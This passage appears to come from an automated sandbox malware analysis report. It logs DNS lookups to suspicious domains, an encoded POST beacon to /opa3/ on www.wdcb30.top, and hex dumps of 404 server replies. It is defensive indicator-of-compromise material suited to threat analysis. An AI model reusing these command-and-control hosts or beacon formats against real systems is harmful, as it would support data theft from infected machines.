        Source: global trafficDNS traffic detected: DNS query: www.new-wellness.net
        Source: global trafficDNS traffic detected: DNS query: www.gerakankoreri.net
        Source: global trafficDNS traffic detected: DNS query: www.inf30027group23.xyz
        Source: global trafficDNS traffic detected: DNS query: www.rmgltd.services
        Source: global trafficDNS traffic detected: DNS query: www.mfgarage.net
        Source: global trafficDNS traffic detected: DNS query: www.chalet-tofane.net
        Source: global trafficDNS traffic detected: DNS query: www.tracy.club
        Source: global trafficDNS traffic detected: DNS query: www.prj81oqde1.buzz
        Source: global trafficDNS traffic detected: DNS query: www.wdeb18.top
        Source: unknownHTTP traffic detected: POST /opa3/ HTTP/1.1Host: www.wdcb30.topAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Encoding: gzip, deflate, brAccept-Language: en-US,enContent-Type: application/x-www-form-urlencodedCache-Control: no-cacheConnection: closeContent-Length: 200Origin: http://www.wdcb30.topReferer: http://www.wdcb30.top/opa3/User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; CPNTDF; .NET4.0C)Data Raw: 37 4c 59 3d 79 39 55 74 35 34 53 49 67 77 74 38 30 6e 50 6d 57 6e 33 63 48 45 6c 38 58 47 41 50 70 58 48 78 72 58 47 70 4a 46 62 56 44 76 58 38 4e 76 4e 71 47 53 66 2f 4b 2b 2f 41 65 44 4b 63 56 33 6d 31 74 50 51 69 4e 31 35 49 4a 4c 5a 70 66 4e 59 48 66 4f 51 6d 5a 2b 54 58 54 63 55 75 67 73 4a 62 48 4b 30 65 42 46 47 4c 4e 59 79 32 4c 41 46 54 4f 6f 4b 68 46 6a 65 42 6e 67 4f 5a 6e 32 73 2f 58 79 73 5a 59 5a 39 6f 42 6b 43 71 48 70 73 69 59 5a 38 2f 64 59 65 42 4e 31 76 6f 59 37 70 67 51 52 38 79 45 64 5a 52 42 4e 44 58 37 48 66 6e 5a 46 79 58 34 4e 71 53 2b 74 48 42 64 56 6c 75 4a 77 3d 3d Data Ascii: 7LY=y9Ut54SIgwt80nPmWn3cHEl8XGAPpXHxrXGpJFbVDvX8NvNqGSf/K+/AeDKcV3m1tPQiN15IJLZpfNYHfOQmZ+TXTcUugsJbHK0eBFGLNYy2LAFTOoKhFjeBngOZn2s/XysZYZ9oBkCqHpsiYZ8/dYeBN1voY7pgQR8yEdZRBNDX7HfnZFyX4NqS+tHBdVluJw==
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 24 Sep 2024 09:26:28 GMTContent-Type: text/htmlContent-Length: 138Connection: closeETag: "66a7ebf9-8a"Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 24 Sep 2024 09:26:31 GMTContent-Type: text/htmlContent-Length: 138Connection: closeETag: "66a7ebf9-8a"Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 24 Sep 2024 09:26:34 GMTContent-Type: text/htmlContent-Length: 138Connection: closeETag: "66a7ebf9-8a"Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 24 Sep 2024 09:26:37 GMTContent-Type: text/htmlContent-Length: 138Connection: closeETag: "66a7ebf9-8a"Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 24 Sep 2024 09:26:43 GMTServer: ApacheX-Frame-Options: SAMEORIGINContent-Length: 13928X-XSS-Protection: 1; mode=blockConnection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 0d 0a 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 4d 61 6b 61 61 6e 20 2d 20 52 65 61 6c 20 45 73 74 61 74 65 20 48 54 4d 4c 20 54 65 6d 70 6c 61 74 65 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 22 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 22 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3e 0d 0a 0d 0a 20 20 20 20 3c 21 2d 2d 20 46 61 76 69 63 6f 6e 20 2d 2d 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 69 6d 67 2f 66 61 76 69 63 6f 6e 2e 69 63 6f 22 20 72 65 6c 3d 22 69 63 6f 6e 22 3e 0d 0a 0d 0a 20 20 20 20 3c 21 2d 2d 20 47 6f 6f 67 6c 65 20 57 65 62 20 46 6f 6e 74 73 20 2d 2d 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 22 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 73 74 61 74 69 63 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 32 3f 66 61 6d 69 6c 79 3d 48 65 65 62 6f 3a 77 67 68 74 40 34 30 30 3b 35 30 30 3b 36 30 30 26 66 61 6d 69 6c 79 3d 49 6e 74 65 72 3a 77 67 68 74 40 37 30 30 3b 38 30 30 26 64 69 73 70 6c 61 79 3d 73 77 61 70 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0d 0a 20 20 20 20 0d 0a 20 20 20 20 3c 21 2d 2d 20 49 63 6f 6e 20 46 6f 6e 74 20 53 74 79 6c 65 73 68 65 65 74 20 2d 2d 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 66 6f 6e 74 2d 61 77 65 73 6f 6d 65 2f 35 2e 31 30 2e 30 2f 63 73 73 2f 61 6c 6c 2e 6d 69 6e 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 6a 73 64 65 6c 69 76 72 2e 6e 65 74 2f 6e 70 6d 2f 62 6f 6f 74 73 74 72 61 70 2d 69 63 6f 6e 73 40 31 2e 34 2e 31 2f 66 6f 6e 74 2f 62 6f 6f 74 73 74 72 61 70 2d 69 63 6f 6e 73 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 24 Sep 2024 09:26:45 GMTServer: ApacheX-Frame-Options: SAMEORIGINContent-Length: 13928X-XSS-Protection: 1; mode=blockConnection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 0d 0a 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 4d 61 6b 61 61 6e 20 2d 20 52 65 61 6c 20 45 73 74 61 74 65 20 48 54 4d 4c 20 54 65 6d 70 6c 61 74 65 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 22 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 22 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3e 0d 0a 0d 0a 20 20 20 20 3c 21 2d 2d 20 46 61 76 69 63 6f 6e 20 2d 2d 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 69 6d 67 2f 66 61 76 69 63 6f 6e 2e 69 63 6f 22 20 72 65 6c 3d 22 69 63 6f 6e 22 3e 0d 0a 0d 0a 20 20 20 20 3c 21 2d 2d 20 47 6f 6f 67 6c 65 20 57 65 62 20 46 6f 6e 74 73 20 2d 2d 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 22 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 73 74 61 74 69 63 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 32 3f 66 61 6d 69 6c 79 3d 48 65 65 62 6f 3a 77 67 68 74 40 34 30 30 3b 35 30 30 3b 36 30 30 26 66 61 6d 69 6c 79 3d 49 6e 74 65 72 3a 77 67 68 74 40 37 30 30 3b 38 30 30 26 64 69 73 70 6c 61 79 3d 73 77 61 70 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0d 0a 20 20 20 20 0d 0a 20 20 20 20 3c 21 2d 2d 20 49 63 6f 6e 20 46 6f 6e 74 20 53 74 79 6c 65 73 68 65 65 74 20 2d 2d 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 66 6f 6e 74 2d 61 77 65 73 6f 6d 65 2f 35 2e 31 30 2e 30 2f 63 73 73 2f 61 6c 6c 2e 6d 69 6e 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 6a 73 64 65 6c 69 76 72 2e 6e 65 74 2f 6e 70 6d 2f 62 6f 6f 74 73 74 72 61 70 2d 69 63 6f 6e 73 40 31 2e 34 2e 31 2f 66 6f 6e 74 2f 62 6f 6f 74 73 74 72 61 70 2d 69 63 6f 6e 73 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 24 Sep 2024 09:26:48 GMTServer: ApacheX-Frame-Options: SAMEORIGINContent-Length: 13928X-XSS-Protection: 1; mode=blockConnection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 0d 0a 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 4d 61 6b 61 61 6e 20 2d 20 52 65 61 6c 20 45 73 74 61 74 65 20 48 54 4d 4c 20 54 65 6d 70 6c 61 74 65 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 22 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 22 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3e 0d 0a 0d 0a 20 20 20 20 3c 21 2d 2d 20 46 61 76 69 63 6f 6e 20 2d 2d 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 69 6d 67 2f 66 61 76 69 63 6f 6e 2e 69 63 6f 22 20 72 65 6c 3d 22 69 63 6f 6e 22 3e 0d 0a 0d 0a 20 20 20 20 3c 21 2d 2d 20 47 6f 6f 67 6c 65 20 57 65 62 20 46 6f 6e 74 73 20 2d 2d 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 22 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 73 74 61 74 69 63 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 32 3f 66 61 6d 69 6c 79 3d 48 65 65 62 6f 3a 77 67 68 74 40 34 30 30 3b 35 30 30 3b 36 30 30 26 66 61 6d 69 6c 79 3d 49 6e 74 65 72 3a 77 67 68 74 40 37 30 30 3b 38 30 30 26 64 69 73 70 6c 61 79 3d 73 77 61 70 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0d 0a 20 20 20 20 0d 0a 20 20 20 20 3c 21 2d 2d 20 49 63 6f 6e 20 46 6f 6e 74 20 53 74 79 6c 65 73 68 65 65 74 20 2d 2d 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 66 6f 6e 74 2d 61 77 65 73 6f 6d 65 2f 35 2e 31 30 2e 30 2f 63 73 73 2f 61 6c 6c 2e 6d 69 6e 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 6a 73 64 65 6c 69 76 72 2e 6e 65 74 2f 6e 70 6d 2f 62 6f 6f 74 73 74 72 61 70 2d 69 63 6f 6e 73 40 31 2e 34 2e 31 2f 66 6f 6e 74 2f 62 6f 6f 74 73 74 72 61 70 2d 69 63 6f 6e 73 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 24 Sep 2024 09:26:51 GMTServer: ApacheX-Frame-Options: SAMEORIGINContent-Length: 13928X-XSS-Protection: 1; mode=blockConnection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 0d 0a 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 4d 61 6b 61 61 6e 20 2d 20 52 65 61 6c 20 45 73 74 61 74 65 20 48 54 4d 4c 20 54 65 6d 70 6c 61 74 65 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 22 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 22 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3e 0d 0a 0d 0a 20 20 20 20 3c 21 2d 2d 20 46 61 76 69 63 6f 6e 20 2d 2d 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 69 6d 67 2f 66 61 76 69 63 6f 6e 2e 69 63 6f 22 20 72 65 6c 3d 22 69 63 6f 6e 22 3e 0d 0a 0d 0a 20 20 20 20 3c 21 2d 2d 20 47 6f 6f 67 6c 65 20 57 65 62 20 46 6f 6e 74 73 20 2d 2d 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 22 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 73 74 61 74 69 63 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 32 3f 66 61 6d 69 6c 79 3d 48 65 65 62 6f 3a 77 67 68 74 40 34 30 30 3b 35 30 30 3b 36 30 30 26 66 61 6d 69 6c 79 3d 49 6e 74 65 72 3a 77 67 68 74 40 37 30 30 3b 38 30 30 26 64 69 73 70 6c 61 79 3d 73 77 61 70 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0d 0a 20 20 20 20 0d 0a 20 20 20 20 3c 21 2d 2d 20 49 63 6f 6e 20 46 6f 6e 74 20 53 74 79 6c 65 73 68 65 65 74 20 2d 2d 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 66 6f 6e 74 2d 61 77 65 73 6f 6d 65 2f 35 2e 31 30 2e 30 2f 63 73 73 2f 61 6c 6c 2e 6d 69 6e 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 6a 73 64 65 6c 69 76 72 2e 6e 65 74 2f 6e 70 6d 2f 62 6f 6f 74 73 74 72 61 70 2d 69 63 6f 6e 73 40 31 2e 34 2e 31 2f 66 6f 6e 74 2f 62 6f 6f 74 73 74 72 61 70 2d 69 63 6f 6e 73 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 24 Sep 2024 09:27:46 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingContent-Encoding: gzipData Raw: 61 64 0d 0a 1f 8b 08 00 00 00 00 00 00 03 4d 8e 31 0f 82 30 10 85 f7 fe 8a 93 5d 0e 0d e3 a5 83 02 91 04 91 98 32 38 62 5a 53 12 a4 48 8b c6 7f 2f 85 c5 f1 dd fb ee cb a3 4d 72 39 8a 5b 95 c2 49 9c 0b a8 ea 43 91 1f 21 d8 22 e6 a9 c8 10 13 91 ac cd 3e 8c 10 d3 32 e0 8c b4 7b 76 9c b4 6a e4 1c 5c eb 3a c5 e3 28 86 d2 38 c8 cc d4 4b c2 f5 c8 08 17 88 ee 46 7e fd df 8e ff 31 73 62 34 70 a1 15 8c ea 35 29 eb 94 84 fa 5a c0 a7 b1 d0 cf dc c3 73 60 7a 70 ba b5 60 d5 f8 56 63 48 38 78 ef 62 9c 1d 7e 09 fb 01 f3 7c 15 3c c4 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: adM10]28bZSH/Mr9[IC!">2{vj\:(8KF~1sb4p5)Zs`zp`VcH8xb~|<0
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 24 Sep 2024 09:27:49 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingContent-Encoding: gzipData Raw: 61 64 0d 0a 1f 8b 08 00 00 00 00 00 00 03 4d 8e 31 0f 82 30 10 85 f7 fe 8a 93 5d 0e 0d e3 a5 83 02 91 04 91 98 32 38 62 5a 53 12 a4 48 8b c6 7f 2f 85 c5 f1 dd fb ee cb a3 4d 72 39 8a 5b 95 c2 49 9c 0b a8 ea 43 91 1f 21 d8 22 e6 a9 c8 10 13 91 ac cd 3e 8c 10 d3 32 e0 8c b4 7b 76 9c b4 6a e4 1c 5c eb 3a c5 e3 28 86 d2 38 c8 cc d4 4b c2 f5 c8 08 17 88 ee 46 7e fd df 8e ff 31 73 62 34 70 a1 15 8c ea 35 29 eb 94 84 fa 5a c0 a7 b1 d0 cf dc c3 73 60 7a 70 ba b5 60 d5 f8 56 63 48 38 78 ef 62 9c 1d 7e 09 fb 01 f3 7c 15 3c c4 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: adM10]28bZSH/Mr9[IC!">2{vj\:(8KF~1sb4p5)Zs`zp`VcH8xb~|<0
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 24 Sep 2024 09:27:51 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingContent-Encoding: gzipData Raw: 61 64 0d 0a 1f 8b 08 00 00 00 00 00 00 03 4d 8e 31 0f 82 30 10 85 f7 fe 8a 93 5d 0e 0d e3 a5 83 02 91 04 91 98 32 38 62 5a 53 12 a4 48 8b c6 7f 2f 85 c5 f1 dd fb ee cb a3 4d 72 39 8a 5b 95 c2 49 9c 0b a8 ea 43 91 1f 21 d8 22 e6 a9 c8 10 13 91 ac cd 3e 8c 10 d3 32 e0 8c b4 7b 76 9c b4 6a e4 1c 5c eb 3a c5 e3 28 86 d2 38 c8 cc d4 4b c2 f5 c8 08 17 88 ee 46 7e fd df 8e ff 31 73 62 34 70 a1 15 8c ea 35 29 eb 94 84 fa 5a c0 a7 b1 d0 cf dc c3 73 60 7a 70 ba b5 60 d5 f8 56 63 48 38 78 ef 62 9c 1d 7e 09 fb 01 f3 7c 15 3c c4 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: adM10]28bZSH/Mr9[IC!">2{vj\:(8KF~1sb4p5)Zs`zp`VcH8xb~|<0
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 24 Sep 2024 09:27:54 GMTContent-Type: text/html; charset=iso-8859-1Content-Length: 196Connection: closeVary: Accept-EncodingData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 